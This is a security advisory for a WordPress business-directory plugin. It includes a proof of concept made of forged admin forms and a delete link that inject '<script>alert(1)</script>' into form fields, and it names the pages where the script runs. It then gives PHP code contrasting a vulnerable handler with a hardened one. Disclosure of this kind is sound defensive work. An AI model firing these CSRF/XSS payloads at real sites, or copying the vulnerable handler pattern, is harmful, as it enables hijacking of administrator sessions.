The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged-in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has been fixed and proper capability checks have also been added in 5.11.1; however, some sanitisation was still missing, still allowing XSS via a high-privilege account in other pages, and a different issue has been created for it.
<!-- Change Form Field XSS -->
<form action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1" method="post">
  <input type="hidden" name="field[id]" value="1">
  <input type="hidden" name="field[tag]" value="title">
  <input type="hidden" name="field[weight]" value="9">
  <label> Field Label </label>
  <input name="field[label]" type="text" aria-required="true" value="<script>alert(1)</script>">
  <label> Field description <span class="description">(optional)</span></label>
  <input name="field[description]" type="text" value="<script>alert(1)</script>">
  <input type="submit" name="submit" id="submit" class="button button-primary" value="Update Field">
</form>

<!-- Add Form Field XSS -->
<form action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1" method="post">
  <label> Field Label </label>
  <input name="field[label]" type="text" aria-required="true" value="<script>alert(1)</script>">
  <label> Field description <span class="description">(optional)</span></label>
  <input name="field[description]" type="text" value="<script>alert(1)</script>">
  <input type="submit" name="submit" id="submit" class="button button-primary" value="Update Field">
</form>

XSS payloads execute:
- On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing
- On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv
- When adding/editing a listing: /wp-admin/post-new.php?post_type=wpbdp_listing
- On various Settings pages, such as /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=listings%2Fsorting and /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=search_settings

<!-- Delete Form Field -->
<a href="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1">Delete</a>
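The three defects chained above (no request-forgery token, no capability check, no sanitisation of field[label] / field[description]) map onto three separate fixes in a WordPress admin handler. The following is an added illustration, not the plugin's own code; the function names, option key and nonce action are assumptions, only the request parameter names come from the PoC.

```php
<?php
// Hypothetical handler for the "edit form field" admin screen (names assumed).

// Vulnerable pattern: trusts the POST body as-is. A forged cross-site form is
// accepted, and raw "<script>" markup is persisted and later echoed unescaped.
function wpbdp_save_form_field_vulnerable() {
    $field = $_POST['field'];
    update_option( 'wpbdp_field_' . (int) $field['id'], $field ); // stored XSS sink
}

// Hardened pattern: nonce, capability check, input sanitisation.
function wpbdp_save_form_field_hardened() {
    $id = isset( $_POST['field']['id'] ) ? absint( $_POST['field']['id'] ) : 0;

    // 1. CSRF: the request must carry a nonce bound to this action and id.
    //    A form hosted on another origin cannot obtain it, so the check dies.
    check_admin_referer( 'wpbdp-edit-field-' . $id, 'wpbdp_field_nonce' );

    // 2. Authorisation: being logged in is not enough; require the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to edit form fields.' ), 403 );
    }

    // 3. Sanitisation: label and description are plain text, so tags are
    //    stripped before storage; "<script>alert(1)</script>" becomes "alert(1)".
    $raw   = wp_unslash( $_POST['field'] );
    $field = array(
        'id'          => $id,
        'tag'         => sanitize_key( $raw['tag'] ?? '' ),
        'weight'      => absint( $raw['weight'] ?? 0 ),
        'label'       => sanitize_text_field( $raw['label'] ?? '' ),
        'description' => sanitize_text_field( $raw['description'] ?? '' ),
    );
    update_option( 'wpbdp_field_' . $id, $field );
}

// 4. Output escaping at every render site (listing submission form, CSV page,
//    settings tabs): escape for HTML context even though input was sanitised.
function wpbdp_render_field_label( array $field ) {
    return '<label>' . esc_html( $field['label'] ) . '</label>';
}

// The legitimate edit form emits the matching token:
//   wp_nonce_field( 'wpbdp-edit-field-' . $id, 'wpbdp_field_nonce' );
// and the "Delete" link from the PoC would be wrapped with wp_nonce_url() and
// verified the same way, so a plain GET to action=deletefield is rejected.
```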
0xB9
0xB9
Yes
2021-04-11
2021-04-12
2021-04-15